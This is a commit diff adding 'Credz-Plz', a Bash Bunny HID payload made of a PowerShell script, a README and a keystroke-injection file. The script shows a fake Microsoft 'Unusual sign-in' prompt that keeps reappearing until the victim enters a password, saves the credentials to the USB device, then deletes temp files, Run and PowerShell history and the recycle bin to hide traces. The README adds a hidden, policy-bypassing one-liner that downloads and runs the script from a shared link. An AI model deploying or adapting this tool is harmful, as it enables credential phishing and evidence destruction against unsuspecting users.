Add files via upload (#523)

payloads/library/credentials/-BB-Credz-Plz/Credz-Plz.ps1

@@ -0,0 +1,178 @@
+############################################################################################################################################################                      
+#                                  |  ___                           _           _              _             #              ,d88b.d88b                     #                                 
+# Title        : Credz-Plz         | |_ _|   __ _   _ __ ___       | |   __ _  | | __   ___   | |__    _   _ #              88888888888                    #           
+# Author       : I am Jakoby       |  | |   / _` | | '_ ` _ \   _  | |  / _` | | |/ /  / _ \  | '_ \  | | | |#              `Y8888888Y'                    #           
+# Version      : 1.0               |  | |  | (_| | | | | | | | | |_| | | (_| | |   <  | (_) | | |_) | | |_| |#               `Y888Y'                       #
+# Category     : Credentials       | |___|  \__,_| |_| |_| |_|  \___/   \__,_| |_|\_\  \___/  |_.__/   \__, |#                 `Y'                         #
+# Target       : Windows 7,10,11   |                                                                   |___/ #           /\/|_      __/\\                  #     
+# Mode         : HID               |                                                           |\__/,|   (`\ #          /    -\    /-   ~\                 #             
+#                                  |  My crime is that of curiosity                            |_ _  |.--.) )#          \    = Y =T_ =   /                 #      
+#                                  |   and yea curiosity killed the cat                        ( T   )     / #   Luther  )==*(`     `) ~ \   Hobo          #                                                                                              
+#                                  |    but satisfaction brought him back                     (((^_(((/(((_/ #          /     \     /     \                #    
+#__________________________________|_________________________________________________________________________#          |     |     ) ~   (                #
+#                                                                                                            #         /       \   /     ~ \               #
+#  github.com/I-Am-Jakoby                                                                                    #         \       /   \~     ~/               #         
+#  twitter.com/I_Am_Jakoby                                                                                   #   /\_/\_/\__  _/_/\_/\__~__/_/\_/\_/\_/\_/\_#                     
+#  instagram.com/i_am_jakoby                                                                                 #  |  |  |  | ) ) |  |  | ((  |  |  |  |  |  |#              
+#  youtube.com/c/IamJakoby                                                                                   #  |  |  |  |( (  |  |  |  \\ |  |  |  |  |  |#
+############################################################################################################################################################
+
+<#
+.SYNOPSIS
+	This script is meant to trick your target into sharing their credentials through a fake authentication pop up message
+
+.DESCRIPTION 
+	A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
+	This will be followed by a fake authentication ui prompt. 
+	If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up 
+	Once the target enters their credentials their information will be uploaded to your Bash Bunny
+
+#>
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+# Creating loot folder
+
+# Get Drive Letter
+$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
+
+# Test if directory exists if not create directory in loot folder to store file
+$TARGETDIR = "$bb\loot\Credz-Plz\$env:computername"
+
+if(!(Test-Path -Path $TARGETDIR )){
+    mkdir $TARGETDIR
+}
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
+ 
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES 
+	This is to generate the ui.prompt you will use to harvest their credentials
+#>
+
+function Get-Creds {
+do{
+$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
+   if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {
+    [System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
+    Get-Creds
+}
+$creds = $cred.GetNetworkCredential() | fl
+return $creds
+  # ...
+
+  $done = $true
+} until ($done)
+
+}
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES 
+	This is to pause the script until a mouse movement is detected
+#>
+
+function Pause-Script{
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+$o=New-Object -ComObject WScript.Shell
+
+    while (1) {
+        $pauseTime = 3
+        if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+            break
+        }
+        else {
+            $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+        }
+    }
+}
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES 
+	This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off 
+#> 
+
+function Caps-Off {
+Add-Type -AssemblyName System.Windows.Forms
+$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
+
+#If true, toggle CapsLock key, to ensure that the script doesn't fail
+if ($caps -eq $true){
+
+$key = New-Object -ComObject WScript.Shell
+$key.SendKeys('{CapsLock}')
+}
+}
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES 
+	This is to call the function to pause the script until a mouse movement is detected then activate the pop-up
+#>
+
+Pause-Script
+
+Caps-Off
+
+Add-Type -AssemblyName System.Windows.Forms
+
+[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. Please authenticate your Microsoft Account")
+
+$creds = Get-Creds
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES 
+	This is to save the gathered credentials to a file in the temp directory
+#>
+
+echo $creds >> $env:TMP\$FileName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES 
+	This exfiltrates your loot to the Bash Bunny
+#>
+
+Move-Item $env:TMP\$FileName $TARGETDIR\$FileName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES 
+	This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder 
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+

payloads/library/credentials/-BB-Credz-Plz/README.md

@@ -0,0 +1,102 @@
+![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
+
+<!-- TABLE OF CONTENTS -->
+<details>
+  <summary>Table of Contents</summary>
+  <ol>
+    <li><a href="#Description">Description</a></li>
+    <li><a href="#getting-started">Getting Started</a></li>
+    <li><a href="#Contributing">Contributing</a></li>
+    <li><a href="#Version-History">Version History</a></li>
+    <li><a href="#Contact">Contact</a></li>
+    <li><a href="#Acknowledgments">Acknowledgments</a></li>
+  </ol>
+</details>
+
+# Credz-Plz
+
+A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.
+
+## Description
+
+A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
+This will be followed by a fake authentication ui prompt. 
+If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up 
+Once the target enters their credentials their information will be uploaded to your dropbox for collection 
+
+![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg)
+
+![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg)
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10,11
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+```
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Version History
+
+* 0.1
+    * Initial Release
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- CONTACT -->
+## Contact
+
+<div><h2>I am Jakoby</h2></div>
+  <p><br/>
+  
+  <img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50"> 
+  
+  <a href="https://github.com/I-Am-Jakoby/">
+    <img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
+  </a>
+  
+  <a href="https://www.instagram.com/i_am_jakoby/">
+    <img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
+  </a>
+  
+  <a href="https://twitter.com/I_Am_Jakoby/">
+    <img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
+  </a>
+  
+  <a href="https://www.youtube.com/c/IamJakoby/">
+    <img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
+  </a>
+
+  Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon)
+</p>
+
+
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- ACKNOWLEDGMENTS -->
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+<p align="right">(<a href="#top">back to top</a>)</p>

payloads/library/credentials/-BB-Credz-Plz/payload.txt

@@ -0,0 +1,22 @@
+# Title:         Credz-Plz
+# Description:   A script used to prompt the target to enter their creds to later be exfiltrated to the Bash Bunny
+# Author:        I am Jakoby
+# Version:       1.0
+# Category:      Recon
+# Attackmodes:   HID, Storage
+# Target:        Windows 10, 11
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID STORAGE
+
+LED STAGE1
+
+QUACK DELAY 3000
+QUACK GUI r
+QUACK DELAY 100
+LED STAGE2
+QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Credz-Plz.ps1')"
+QUACK ENTER